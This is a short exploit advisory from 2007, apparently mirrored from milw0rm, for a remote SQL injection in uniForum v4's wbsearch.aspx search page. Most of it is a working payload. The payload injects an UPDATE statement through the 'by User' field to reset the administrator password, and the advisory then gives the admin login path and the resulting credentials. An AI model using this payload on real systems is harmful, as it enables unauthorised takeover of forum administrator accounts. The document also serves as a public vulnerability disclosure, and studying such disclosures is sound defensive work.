Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15677
HistoryJan 11, 2007 - 12:00 a.m.

uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

2007-01-1100:00:00
vulners.com
19

Title : uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : …

Vendor : http://uniforum.biz/

$$ : $99


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

//Fin the ->wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'–

Login Admin:http://www.xxx.com/[path]/wbadmlog.aspx
Username: Administrator
Password: 000245

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!

milw0rm.com [2007-01-09]